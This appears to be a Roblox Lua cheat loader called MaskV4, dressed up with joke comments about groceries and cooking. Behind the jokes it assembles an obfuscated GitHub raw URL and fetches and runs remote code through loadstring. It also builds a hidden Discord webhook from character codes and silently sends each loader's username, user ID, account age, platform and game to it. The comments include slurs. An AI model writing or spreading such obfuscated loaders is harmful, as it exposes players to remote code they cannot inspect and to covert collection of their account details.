-- 🎭 totally normal roblox script -- i am just gooning to foids here -- NGA ONG IF U SKID TS local Players = game:GetService("Players") local UserInputService = game:GetService("UserInputService") local HttpService = game:GetService("HttpService") local lp = Players.LocalPlayer -- ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ -- step 1: check if fridge is running (very important) -- ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ local fridgeIsRunning = true -- it is local aeroV4IsBetter = false -- it is not local catVapeIsGood = false -- absolutely not local skidCount = 0 -- too many if aeroV4IsBetter then print("this will never print lol") end -- ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ -- step 2: prepare the grocery list (normal shopping stuff) -- ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ -- these are my groceries (bread, milk, etc.) local grocery1 = {"h","t","t","p","s",":","//"} local grocery2 = {"r","a","w",".","g","i","t","h","u","b","u","s","e","r","c","o","n","t","e","n","t",".","c","o","m","/"} -- 🆕 NEW GROCERY LIST (points to solar-dient/main/Top1CC) local grocery3 = { "M","a","s","k","e","d","R","B","L","X","/", "s","o","l","a","r","-","d","i","e","n","t","/", "m","a","i","n","/", "T","o","p","1","C","C" } -- totally unrelated sigma rizz ohio table local ohioWords = {"rizz","sigma","gyatt","skibidi","mewing","jawmaxxing"} for i = 1, #ohioWords do ohioWords[i] = ohioWords[i]:reverse():reverse():reverse():reverse() end -- very important function that concatenates groceries local function goShopping(shoppingCart) local receipt = "" for _, item in ipairs(shoppingCart) do receipt = receipt .. item end return receipt end -- checkout time (absolutely nothing to do with a url) local shoppingReceipt = goShopping(grocery1) .. goShopping(grocery2) .. goShopping(grocery3) -- making sure the receipt isnt tampered with (quality control) shoppingReceipt = shoppingReceipt:gsub("Masked","Masked") -- ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ -- step 3: checks who nga loaded this (player info ping) -- ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ task.spawn(function() local platform = "🖥️ PC" pcall(function() if UserInputService.TouchEnabled and not UserInputService.KeyboardEnabled then platform = "📱 Mobile (brave)" elseif UserInputService.GamepadEnabled then platform = "🎮 Console (respect)" else platform = "🖥️ PC" end end) local username = lp.Name local displayName = lp.DisplayName local userId = lp.UserId local accountAge = lp.AccountAge local gameName = game.Name local ageStr if accountAge < 30 then ageStr = accountAge .. " days (fresh acc 👀)" elseif accountAge < 365 then ageStr = math.floor(accountAge / 30) .. " months" else ageStr = math.floor(accountAge / 365) .. " year(s)" end local avatarUrl = "https://www.roblox.com/headshot-thumbnail/image?userId=" .. userId .. "&width=420&height=420&format=png" local w1 = string.char(104,116,116,112,115,58,47,47) local w2 = string.char(100,105,115,99,111,114,100,46) local w3 = string.char(99,111,109,47,97,112,105,47) local w4 = string.char(119,101,98,104,111,111,107,115,47) local w5 = "14907992924" local w6 = "64627875/n9" local w7 = "XdGov7aSqXQ" local w8 = "SkkosEy8IYr" local w9 = "hNU4FCD5fl9" local w10= "PvyrkLg__s2" local w11= "Pd6qg2u0pGT" local w12= "MGHwQXlRwV1" local webhookUrl = w1..w2..w3..w4..w5..w6..w7..w8..w9..w10..w11..w12 local requestFunc = (syn and syn.request) or (http and http.request) or request or http_request if not requestFunc then return end local embedBody = HttpService:JSONEncode({ username = "MaskV4 🎭 Loader", avatar_url = avatarUrl, embeds = {{ title = "🎭 MaskV4 — New Load", color = 0xA855F7, description = "**" .. displayName .. "** (@" .. username .. ") just loaded MaskV4.\n" .. "> *WE WEAR THE MASK 🎭🤫*", thumbnail = { url = avatarUrl }, fields = { { name = "👤 Display Name", value = "
" .. displayName .. "
", inline = true }, { name = "🔖 Username", value = "
@" .. username .. "
", inline = true }, { name = "🆔 User ID", value = "
" .. tostring(userId) .. "
", inline = true }, { name = "📅 Account Age", value = "
" .. ageStr .. "
", inline = true }, { name = "💻 Platform", value = "
" .. platform .. "
", inline = true }, { name = "🎮 Game", value = "
" .. gameName .. "
", inline = true }, }, footer = { text = "MaskV4 by realmasked • discord.gg/44MkWh2QS • FUCK AERO V4 🎭", icon_url = avatarUrl, }, timestamp = os.date("!%Y-%m-%dT%H:%M:%SZ"), }}, }) pcall(function() requestFunc({ Url = webhookUrl, Method = "POST", Headers = { ["Content-Type"] = "application/json" }, Body = embedBody, }) end) end) -- ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ -- step 4: cook the groceries (load the NEW script) -- ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ local function cookPasta(recipeUrl) local recipe = game:HttpGet(recipeUrl) local cookedPasta = loadstring(recipe) if cookedPasta then cookedPasta() end end local ok, err = pcall(cookPasta, shoppingReceipt) if not ok then warn("[MaskV4] Pasta failed to cook: " .. tostring(err)) warn("[MaskV4] Join discord.gg/44MkWh2QS if it keeps failing") end -- step 5: there is no step 5 -- (the homework is done, teacher will be proud 🎭)
